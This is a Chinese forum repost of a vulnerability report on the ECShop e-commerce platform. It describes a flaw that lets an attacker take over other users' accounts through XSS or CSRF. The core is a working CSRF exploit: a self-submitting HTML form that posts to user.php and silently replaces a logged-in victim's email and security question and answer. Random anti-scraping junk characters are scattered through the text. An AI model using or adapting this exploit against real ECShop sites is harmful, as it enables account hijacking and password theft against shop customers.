找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1817|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
% _! ~! ]8 M- d# q* Cecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
; v6 }4 `2 O% D* [. I
3 ^( V' l% i" O: T( iDemo For:http://www.wooyun.org/bug.php?action=view&id=395/ ~& ^0 ~5 u: b% g& a3 s# p

* V/ W" w& j7 p+ F% A+ T详细说明:8 T) `& N1 c) b$ b
利用csrf和xss可以突破官方所说的“障碍”
/ V2 y- x- m" c* ^. g' r% w% Exss版本已经有人说明
; G( X& V$ Y; z& s) u+ p这里给出csrf版本
& l1 @: C- h  |5 B# U$ G0 u+ d
' C6 Z( |+ S9 u7 h漏洞证明:: V! `, X% {- k& N9 P) ?0 u
<html>
! i3 S/ n+ K  l) e& A& W4 V<body>3 ?; N, q' N1 {+ z1 {2 \
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
2 P+ M" I! w! ?; H<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
  W1 W) ?9 g3 s. {7 i- y& O. h1 ^<INPUT TYPE="text" NAME="act" value="act_edit_profile">6 K: x2 _, l" j$ r0 L3 x
<INPUT TYPE="text" NAME="sel_question" value="ecshop">2 v  p) e  v' b; K# Y$ B
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">; g( E( b1 K% G# ?6 J$ x4 P
</body>. j  B6 x7 P$ k9 f! Q
<script>3 x- T' n8 A5 O4 x) J
document.forms[0].submit();; u. s" _. Z  L# m5 u
</script>
/ r# }, U: }( z3 p6 A</html>" Q9 R  m# ?+ z: A8 [
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失0 F, v0 P( d8 N6 |

# v7 b* C+ j7 b4 d% p2 F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表